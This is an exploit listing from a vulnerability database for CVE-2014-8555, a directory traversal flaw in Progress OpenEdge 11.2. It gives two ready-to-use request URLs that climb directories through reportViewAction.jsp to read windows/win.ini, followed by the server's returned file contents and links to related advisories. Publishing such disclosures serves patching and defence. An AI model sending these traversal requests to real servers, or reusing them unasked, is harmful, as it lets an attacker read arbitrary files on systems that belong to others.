Lucene search
Mauricio Correa1337DAY-ID-22848HistoryNov 10, 2014 - 12:00 a.m.
Progress OpenEdge 11.2 - Directory Traversal Vulnerability
2014-11-1000:00:00
Mauricio Correa
0day.today
27
EPSS
0.057
Percentile
93.5%
Exploit for php platform in category web applications
# Exploit Title: Progress OpenEdge Directory Traversal
# Date: 30/10/2014
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.progress.com
# Software Link: www.progress.com/products/openedge
# Version: 11.2
# Tested on: Windows OS
# CVE : CVE-2014-8555
The malicious user sends a malformed request that generates the file access
up directories as follows:
http://target_ip:9090/report/reportViewAction.jsp?selection=..%2f..%2f..%2f.
.%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
or else
http://
target_ip:9090/report/reportViewAction.jsp?selection=../../../../../../../..
/../../windows/win.ini
And the application answers
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
CMCDLLNAME32=mapi32.dll
CMC=1
MAPIX=1
MAPIXVER=1.0.0.1
OLEMessaging=1
More informations (in Br-Portuguese): https://www.xlabs.com.br/blog/?p=256
Thanks
# 0day.today [2018-03-20] #Related
packetstorm
packetstorm
Progress OpenEdge 11.2 Directory Traversal
2014-11-11 00:00:00
exploitdb
exploitdb
Progress OpenEdge 11.2 - Directory Traversal
2014-10-31 00:00:00
prion
prion
Directory traversal
2014-11-12 16:55:00
cvelist
cvelist
CVE-2014-8555
2014-11-12 16:00:00
nvd
nvd
CVE-2014-8555
2014-11-12 16:55:07
cve
cve
CVE-2014-8555
2014-11-12 16:55:07